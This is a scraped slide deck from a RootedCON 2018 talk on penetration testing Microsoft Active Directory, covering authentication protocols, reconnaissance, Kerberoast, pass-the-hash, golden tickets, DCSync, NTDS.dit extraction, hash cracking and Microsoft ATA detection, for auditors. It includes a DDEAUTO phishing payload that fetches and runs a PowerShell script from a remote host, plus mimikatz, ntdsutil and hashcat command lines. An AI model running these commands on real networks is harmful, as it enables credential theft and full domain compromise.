SlideShare une entreprise Scribd logo

Carlos García - Pentesting Active Directory [rooted2018]

RootedCON
RootedCON

Introducción a las pruebas de intrusión en entornos Microsoft Active Directory en forma de ponencia práctica para auditores o personas interesadas en el pentesting en entornos corporativos. Se dará una breve introducción al servicio de directorio Active Directory y sus componentes más críticos desde el punto de vista de la seguridad.Posteriormente, se explicarán las principales diferencias con respecto a un pentesting clásico de infraestructura, así como las técnicas y ataques más comunes para llevar a cabo el ejercicio y comprometer completamente el dominio corporativo.Requisitos: Se recomienda que los asistentes tengan conocimientos básicos de Active Directory y básicos/medios de pentesting o hacking ético, preferiblemente en infraestructuras y/o Sistemas Operativos.

Technologie
1  sur  96
Télécharger pour lire hors ligne
PENTESTING ACTIVE DIRECTORY Carlos García García ciyinet
ciyinet WHOAMI Carlos García García - Computer Science Engineer - Penetration Testing and Red Teaming - OSCP Certified - Co-author book “Hacking Windows: Ataques a sistemas y redes Microsoft” 2Pentesting Active Directory
ciyinet WHAT ARE WE GOING TO TALK ABOUT? - Introduction to Active Directory - Authentication Protocols - Active Directory Penetration Testing - Reconnaissance - Common Attacks & Techniques - Lateral and Vertical Movements - How-to Avoid Being Caught 3Pentesting Active Directory
ciyinet BEAR IN MIND - AD-related techniques - I learn Active Directory from the offensive side - We lower risks and not the other way around - This is going to be intense 4Pentesting Active Directory
ciyinet 5 ACTIVE DIRECTORY 101 Pentesting Active Directory
ciyinet ACTIVE DIRECTORY 101 • AD is Microsoft’s answer to directory services • Directory service is a hierarchical structure to store objects for quick access and management of all resources 6Pentesting Active Directory
ciyinet ACTIVE DIRECTORY 101 • Uses LDAP as its access protocol • Relies on DNS as its locator service, enabling clients to locate domain controllers through DNS queries • AD supports several Naming Conventions • User Principal Names (UPN): • user@domain • LDAP names (Distinguished Names): • cn=common name • ou=organizational unit • dc=domain • for eg. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON 7Pentesting Active Directory
ciyinet ACTIVE DIRECTORY 101 8Pentesting Active Directory
ciyinet ACTIVE DIRECTORY 101 Just a Database: NTDS.dit 9Pentesting Active Directory
ciyinet ACTIVE DIRECTORY 101 Domain Controllers and Domain Admins 10Pentesting Active Directory
ciyinet CREDENTIALS FLOW IN WINDOWS 11Pentesting Active Directory
ciyinet 12 NTLM SCHEME Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
ciyinet 13 KERBEROS SCHEME Pentesting Active Directory Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
ciyinet 14 KERBEROS SCHEME Pentesting Active Directory 1. Client encrypts a timestamp with his/her hash/key 2. Client receives a TGT signed with the domain krbtgt account that proves they are who they say they are 3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain. 4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN) Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
PENTESTING ACTIVE DIRECTORY Sure, but how about actually pentesting it?
ciyinet ACTIVE DIRECTORY PENETRATION TESTING The Goal 16Pentesting Active Directory
ciyinet ACTIVE DIRECTORY PENETRATION TESTING The Goal 17Pentesting Active Directory • Domain admins • Enterprise admins • Built-in administrators • Account Operators • Allowed RODC Password Replication Group • Backup Operators • DnsAdmins • …
ciyinet ACTIVE DIRECTORY PENETRATION TESTING The real Goal! 18Pentesting Active Directory
ciyinet ACTIVE DIRECTORY PENETRATION TESTING The real Goal! WMIC 19Pentesting Active Directory
ciyinet 20 ATTACK KILL CHAIN Reference: Microsoft Advanced Threat Analytics Pentesting Active Directory
ciyinet 21 ATTACK KILL CHAIN Pentesting Active Directory
ciyinet 22 ATTACK KILL CHAIN Pentesting Active Directory
PENTESTING ACTIVE DIRECTORY Infrastructure
ciyinet 24Pentesting Active Directory
PENTESTING ACTIVE DIRECTORY Classic Intrusion Scheme
ciyinet 26Pentesting Active Directory
ciyinet 27 PHISHING + DDEAUTO = RCE • Dynamic Data Exchange (DDE): protocol for transferring data between applications • Valid for MS Excel, MS Word… and MS Outlook • Recently used as macro-less Malware DDEAUTO "C:ProgramsMicrosoftOffice365Outlook........windowssystem 32WindowsPowerShellv1.0powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire- test.ps1');powershell -e $e # " "Beneficios Qurtuba" Pentesting Active Directory
ciyinet 28
ciyinet 29 NEXT STEPS • Persistence (userland) • Recoinaissance • Privilege escalation • PowerSploit PowerUp • Bypass UAC • … • Persistence (admin) • Lateral and vertical movements • Grab and exfiltrate trophies Pentesting Active Directory
PENTESTING ACTIVE DIRECTORY Reconnaissance
ciyinet LOCAL RECONNAISSANCE Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting Command Description ipconfig /all Displays the IP address, subnet mask, and default gateway for all adapters. Also info about DHCP and DNS settings whoami /all Displays all information in the current access token, including the current user name, security identifiers (SID), privileges, and groups that the current user belongs to net localgroup Displays the name of the server and the names of local groups on the computer. net localgroup “administrators” Displays local administrators netstat -an Displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table tasklist /V Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer 31Pentesting Active Directory
ciyinet LOCAL RECONNAISSANCE Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting Command Description net start Lists started Windows services sc qc <SERVICE> Gets the parameters for an individual service accesschk.exe -ucqv <SERVICE> Determine service access control rules (accesschk.exe is part of Microsoft Sysinternals suite) systeminfo > info_output.txt Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties, such as RAM, disk space, and network cards schtasks /query /fo LIST /v list of scheduled tasks: whether they are recurring, where the task can be found and its parameters, as well as, crucially, what permissions they are run with dir, type, findstr Browse and search for information in the local file system. 32Pentesting Active Directory
ciyinet NETWORK RECONNAISSANCE Command Description ping ☺ echo %USERDOMAIN% Domain name which the host is joined to echo %logonserver% Obtains the name of the Domain Controller the host used to authenticate toset logonserver net group /domain Lists existing groups in the domain net group <GROUP NAME>/domain Lists members of a group. I.e: “domain computers”, “domain controllers”, “domain admins” net localgroup administrators /domain Gets members of the built-in group “Administrators” Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting 33Pentesting Active Directory
ciyinet NETWORK RECONNAISSANCE Command Description net user /domain Lists all users within the domaindominio actual net user <ACCOUNT NAME> /domain Obtains detailed information about a user given his username net view Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain net use Access to shared resources net accounts /domain Obtains the domain password policy nltest /domain_trusts Maps trust relationships Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting 34Pentesting Active Directory
ciyinet 35
PENTESTING ACTIVE DIRECTORY Common Attacks & Techniques
ciyinet 37 COMMON ATTACKS & TECHNIQUES • Passwords in SYSVOL & Group Policy Preferences – 10% • Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5% • Kerberos TGS Service Ticket Cracking (Kerberoast) – 20% • SMB Shares Mining – 75% • Credential Theft Shuffle (“Mimikatz dance”) – 60% Reference: https://adsecurity.org/?p=2362 Pentesting Active Directory
ciyinet 38 COMMON ATTACKS & TECHNIQUES • Passwords in SYSVOL & Group Policy Preferences – 10% • Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5% • Kerberos TGS Service Ticket Cracking (Kerberoast) – 20% • SMB Shares Mining – 75% • Credential Theft Shuffle (“Mimikatz dance”) – 60% Reference: https://adsecurity.org/?p=2362 Pentesting Active Directory
ciyinet 39 KERBEROAST Pentesting Active Directory 1. Client encrypts a timestamp with his/her hash/key 2. Client receives a TGT signed with the domain krbtgt account that proves they are who they say they are 3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain. 4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN) Attacker
ciyinet 40 KERBEROAST • Offline brute force of password of service account within service tickets (TGS) • No risk of detection • No account lockouts • Invoke-Kerberoast from PowerView (dev) to collect hashes • Focus on user accounts. They have shorter passwords • JohnTheRipper (magnumripper) to crack them References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/magnumripper/JohnTheRipper Pentesting Active Directory
ciyinet 41 SMB SHARES MINING • Usually very fruitful, but sometimes boring and time consuming • Enumerating shares in the environment and looking for data with hardcoded creds (scripts, config files), backups, documentation… PowerView Find-ShareDomain • Searches for computer shares on the domain. If -CheckShareAccess is passed, then only shares the current user has read access to are returned. smbmap • Intended to simplify searching for potentially sensitive data across large networks. • Enumerates samba share drives across an entire domain. List drives, permissions, contents, upload/download functionality, file name auto-download pattern matching, etc. Reference: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/ShawnDEvans/smbmap Pentesting Active Directory
ciyinetTitulo de la Ponencia 42
ciyinet 43 CREDENTIAL THEFT SHUFFLE • Escalating privileges on some machine • Extracting creds/hashes from memory • Derivative administrator • User hunting: moving laterally and repeating the attack till Domain Admin level is reached References: https://github.com/gentilkiwi/mimikatz Pentesting Active Directory “Mimikatz dance”
ciyinet DERIVATIVE ADMINISTRATOR 44Pentesting Active Directory
ciyinet 45 USER HUNTING List local admins remotely • Get-localadmin (Script) • Get-NetLocalGroup (PowerView) List active sessions remotely • PsLoggedon (Sysinternals) • Get-NetLoggedon (PowerView) • Get-NetSession (PowerView) • Tasklist References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://docs.microsoft.com/en-us/sysinternals/ https://gitlab.com/ciyinet/ciyinotes/blob/master/Microsoft%20Windows/readme.md Pentesting Active Directory
ciyinet 46
ciyinet 47 USER HUNTING • Invoke-UserHunter (PowerView) • BloodHound 1. Gets groups and group members of each group 2. Lists domain computers 3. Obtains local admins for each computer 4. Lists active sessions on each computer References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/BloodHoundAD/BloodHound Pentesting Active Directory
ciyinet
Creds dump + Privs escalation
ciyinetPentesting Active Directory 50 NTLM RELAY
ciyinet 51 PASS-THE-HASH Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
ciyinet 52 PASS-THE-HASH Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
ciyinet 53 OVERPASS-THE-HASH (PASS-THE-KEY) Kerberos Kerberos References: http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash Pentesting Active Directory Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
ciyinet 54 (OVER)PASS-THE-HASH Pentesting Active Directory mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /run:PROGRAM"
Titulo de la Ponencia 55
ciyinetPentesting Active Directory 56 PASS-THE-TICKET • Inject Kerberos tickets • Tickets must be in Kerberos credential format (KRB_CRED) - http://tools.ietf.org/html/rfc4120#section-5.8 • Kerberos module does not require any privilege. It uses official Microsoft Kerberos API mimikatz.exe "kerberos::ptt FILENAME"
ciyinet 57 GOLDEN TICKET Encrypted with KRBTGT hash Attacker TGT: • Username • Groups membership • … krbtgt:hash Pentesting Active Directory
ciyinet 58 GOLDEN TICKET KRBTGT hash can be used to generate arbitrary TGT: • Made by the attacker, not KDC • Anything can be pushed inside mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt" Pentesting Active Directory
ciyinetPentesting Active Directory 59
ciyinet 60 DCSYNC • It “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller • Replicates the user credentials via GetNCChanges (Directory Replication Service (DRS) Remote Protocol) • Special rights are required to run DCSync mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit mimikatz.exe "lsadump::dcsync /all /csv" exit Pentesting Active Directory
ciyinetPentesting Active Directory 61
ciyinetPentesting Active Directory 62 DCSHADOW Register new domain controllers to inject malicious AD objects and so create backdoors or any kind of illegitimate access or right Reference: https://blog.alsid.eu/dcshadow-explained-4510f52fc19d Hi guys! This is DCShadow!
PENTESTING ACTIVE DIRECTORY dir is boring, show me how to RCE
ciyinetPentesting Active Directory 64 REMOTE CODE EXECUTION AT Schtasks SC at TARGET_HOST HH:MM EXECUTABLE schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S TARGET_HOST /RU System schtasks /run /tn TASK_NAME /S TARGET_HOST sc TARGET_HOST create SERVICE_NAME binpath= “EXECUTABLE” sc TARGET_HOST start SERVICE_NAME
ciyinetPentesting Active Directory 65 REMOTE CODE EXECUTION WMIC WinRM PsExec wmic /node:TARGET_HOST process call create “EXECUTABLE” Invoke-Command –ComputerName TARGET_HOST –ScriptBlock { COMMAND(S) } PsExec.exe TARGET_HOST –u USER PROCESS
PENTESTING ACTIVE DIRECTORY Let’s grab the NTDS.dit DB
ciyinet NTDS.DIT 67Pentesting Active Directory
ciyinet NTDS.DIT How-to get hashes from it: 1. Decrypt Password Encryption Key (PEK). PEK is encrypted using bootkey 2. Hashes decryption first round with PEK using RC4 3. Hashes decryption second round with DES 68Pentesting Active Directory
ciyinet 69 GRAB NTDS.DIT AND SYSTEM Volume Shadow Copy Ntdsutil Invoke-NinjaCopy Invoke-NinjaCopy –Path “C:WindowsNTDSntds.dit” –LocalDestination “C:ntds.dit” Invoke-NinjaCopy –Path “C:WindowsSystem32configSYSTEM” –LocalDestination “C:SYSTEM” ntdsutil "ac i ntds" "ifm" "create full c:copy-ntds" quit quit vssadmin create shadow /for=C: Pentesting Active Directory
ciyinetTitulo de la Ponencia 70
ciyinetTitulo de la Ponencia 71
ciyinet John the Ripper Hashcat & Rockyou wordlist 72 CRACKING NT HASHES john FILE_HASHES --format=NT hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt --potfile-path OUTPUT_NT.pot Pentesting Active Directory
ciyinetPentesting Active Directory 73
Pentesting Active Directory 74
PENTESTING ACTIVE DIRECTORY But how about the blue team? Microsoft ATA
ciyinetPentesting Active Directory 76 MICROSOFT ATA
ciyinet 77 PASS-THE-HASH Pentesting Active Directory • Based on local Security events • Not capture by ATA by default • Force NTLM to be used • Overpass-the-hash: Encryption downgrade is detected mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
ciyinet 78 PASS-THE-HASH Pentesting Active Directory • Based on local Security events • Not capture by ATA by default • Force NTLM to be used • Overpass-the-hash: Encryption downgrade is detected mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
ciyinetPentesting Active Directory 79
ciyinet 80 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
ciyinet 81 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
ciyinet 82 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
ciyinet 83 DCSYNC DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected Pentesting Active Directory
ciyinet 84 DCSYNC DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected Microsoft ATA Attacker Pentesting Active Directory
PENTESTING ACTIVE DIRECTORY Wrapping Up
ciyinet 86 • Plaintext creds • WDigest • SMB Mining • mimikittenz • LaZagne • WCMDump • Hash • Memory dump • … Pentesting Active Directory
ciyinet 87 • Run as • NTLM Relay • Pass-the-hash • Pass-the-ticket • Golden ticket Logon session User SID Group SIDs Logon SID Others … Access token Pentesting Active Directory
ciyinet 88 • PsExec • WinRM • AT • Schtasks • WMIC • SC Pentesting Active Directory
ciyinet 89 • DCSync • DCShadow • Golden ticket • SMB Mining Pentesting Active Directory
ciyinet 90 • DCSync • DCShadow • Golden ticket • SMB Mining Pentesting Active Directory
ciyinet 91 • NTDS.dit • Volume Shadow Copy • Ntdsutil • Invoke-NinjaCopy • Persistence • Golden ticket • Skeleton key • ACL-based backdoors • Malicious SSP • Password filters • …. • DSInternals • Impacket Secretsdump Pentesting Active Directory • Crack hashes
ciyinet 92 • NTDS.dit • Volume Shadow Copy • Ntdsutil • Invoke-NinjaCopy • Persistence • Golden ticket • Skeleton key • ACL-based backdoors • Malicious SSP • Password filters • …. • DSInternals • Impacket Secretsdump Pentesting Active Directory • Crack hashes
ciyinet 93 BUSINESS RISK Compromise of just one Domain Admin account in the Active Directory exposes the entire organization to risk. The attacker would have unrestricted access to all resources managed by the domain, all users, servers, workstations and data. Moreover, the attacker could instantly establish persistence in the Active Directory environment, which is difficult to notice and cannot be efficiently remediated with guarantees. “Once domain admin, always domain admin” Pentesting Active Directory
ciyinet 94 ACKNOWLEDGMENT & REFERENCES • Miroslav Sotak and TVM team • FWHIBBIT • RootedCON and any other Sec Community in Spain Pentesting Active Directory
ciyinetPentesting Active Directory 95 PENTESTING ACTIVE DIRECTORY
PENTESTING ACTIVE DIRECTORY Questions? Answers ciyinet carlos@ciyi.es ciyinet@protonmail.com

Recommandé

Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active DirectorySunny Neo
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on itWSO2
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?btpsec
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for IdentityNikhil Mittal
 
Ceh v5 module 05 system hacking
Ceh v5 module 05 system hackingCeh v5 module 05 system hacking
Ceh v5 module 05 system hackingVi Tính Hoàng Nam
 

Recommandé

Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active DirectorySunny Neo
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on itWSO2
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?btpsec
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for IdentityNikhil Mittal
 
Ceh v5 module 05 system hacking
Ceh v5 module 05 system hackingCeh v5 module 05 system hacking
Ceh v5 module 05 system hackingVi Tính Hoàng Nam
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing ExplainedRand W. Hirt
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
Privileged Access Management - Unsticking Your PAM Program - CIS 2015
Privileged Access Management - Unsticking Your PAM Program - CIS 2015Privileged Access Management - Unsticking Your PAM Program - CIS 2015
Privileged Access Management - Unsticking Your PAM Program - CIS 2015Lance Peterman
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3ShivamSharma909
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationJustin Bui
 
Beyond the mcse red teaming active directory
Beyond the mcse red teaming active directoryBeyond the mcse red teaming active directory
Beyond the mcse red teaming active directoryPriyanka Aash
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodologyRashad Aliyev
 
Application Security
Application SecurityApplication Security
Application SecurityReggie Niccolo Santos
 
Ceh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingCeh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingVi Tính Hoàng Nam
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
mimikatz @ phdays
mimikatz @ phdaysmimikatz @ phdays
mimikatz @ phdaysBenjamin Delpy
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Cyber Security Incident Response
Cyber Security Incident ResponseCyber Security Incident Response
Cyber Security Incident ResponsePECB
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chainAnkita Ganguly
 
Web Hacking
Web HackingWeb Hacking
Web HackingInformation Technology
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopAjay Choudhary
 
Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People SPC Adriatics
 

Contenu connexe

Tendances

Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing ExplainedRand W. Hirt
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
Privileged Access Management - Unsticking Your PAM Program - CIS 2015
Privileged Access Management - Unsticking Your PAM Program - CIS 2015Privileged Access Management - Unsticking Your PAM Program - CIS 2015
Privileged Access Management - Unsticking Your PAM Program - CIS 2015Lance Peterman
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3ShivamSharma909
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationJustin Bui
 
Beyond the mcse red teaming active directory
Beyond the mcse red teaming active directoryBeyond the mcse red teaming active directory
Beyond the mcse red teaming active directoryPriyanka Aash
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodologyRashad Aliyev
 
Ceh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingCeh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingVi Tính Hoàng Nam
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Cyber Security Incident Response
Cyber Security Incident ResponseCyber Security Incident Response
Cyber Security Incident ResponsePECB
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 

Tendances (20)

Xss attack
Xss attackXss attack
Xss attack
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
Privileged Access Management - Unsticking Your PAM Program - CIS 2015
Privileged Access Management - Unsticking Your PAM Program - CIS 2015Privileged Access Management - Unsticking Your PAM Program - CIS 2015
Privileged Access Management - Unsticking Your PAM Program - CIS 2015
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token Manipulation
 
Beyond the mcse red teaming active directory
Beyond the mcse red teaming active directoryBeyond the mcse red teaming active directory
Beyond the mcse red teaming active directory
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodology
 
Application Security
Application SecurityApplication Security
Application Security
 
Ceh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingCeh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hacking
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
mimikatz @ phdays
mimikatz @ phdaysmimikatz @ phdays
mimikatz @ phdays
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Cyber Security Incident Response
Cyber Security Incident ResponseCyber Security Incident Response
Cyber Security Incident Response
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chain
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing Presentation
 

Similaire à Carlos García - Pentesting Active Directory [rooted2018]

BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopAjay Choudhary
 
Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People SPC Adriatics
 
Module 4 Enumeration
Module 4 EnumerationModule 4 Enumeration
Module 4 Enumerationleminhvuong
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
